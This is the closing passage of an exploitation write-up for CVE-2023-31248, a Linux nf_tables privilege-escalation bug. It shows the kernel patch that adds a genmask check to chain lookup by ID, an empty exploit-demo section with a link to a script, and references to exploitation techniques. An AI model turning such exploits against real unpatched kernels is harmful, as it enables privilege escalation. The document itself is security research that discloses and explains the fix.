Patch Analysis
To patch the bug, simply check the genmask when looking up a chain by its ID.
net/netfilter/nf_tables_api.c | 11 +++++++----
1 file changed, 7 insertions(+), 4 deletions(-)
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 9573a8fcad79..3701493e5401 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2694,7 +2694,7 @@ static int nf_tables_updchain(struct nft_ctx *ctx, u8 genmask, u8 policy,
static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
const struct nft_table *table,
- const struct nlattr *nla)
+ const struct nlattr *nla, u8 genmask)
{
struct nftables_pernet *nft_net = nft_pernet(net);
u32 id = ntohl(nla_get_be32(nla));
@@ -2705,7 +2705,8 @@ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
if (trans->msg_type == NFT_MSG_NEWCHAIN &&
chain->table == table &&
- id == nft_trans_chain_id(trans))
+ id == nft_trans_chain_id(trans) &&
+ nft_active_genmask(chain, genmask))
return chain;
}
return ERR_PTR(-ENOENT);
@@ -3809,7 +3810,8 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
return -EOPNOTSUPP;
} else if (nla[NFTA_RULE_CHAIN_ID]) {
- chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);
+ chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
+ genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
@@ -10502,7 +10504,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
genmask);
} else if (tb[NFTA_VERDICT_CHAIN_ID]) {
chain = nft_chain_lookup_byid(ctx->net, ctx->table,
- tb[NFTA_VERDICT_CHAIN_ID]);
+ tb[NFTA_VERDICT_CHAIN_ID],
+ genmask);
if (IS_ERR(chain))
return PTR_ERR(chain);
} else {
Exploit Demo
Here is a demonstration of the exploit in action:
The exploit script can be obtained here.
Acknowledgements
I would like to thank my mentor Billy for teaching me so many cool techniques and guiding me, Jacob for giving me this internship opportunity, and everyone else at Star Labs! :D
References and Credits
- Mingi Cho of Theori for reporting CVE-2023-31248
- David Bouman for his article on nftables and for the helper library functions https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/
- Bien Pham for stabilizing the race condition with audit and for the validate ops idea https://github.com/kungfulon/nf-tables-lpe/tree/master/chain-active
- Elixir Bootlin for the kernel source code https://elixir.bootlin.com/linux/v6.2/source/net/netfilter/nf_tables_api.c
- Andy Nguyen for msg_msg tricks https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html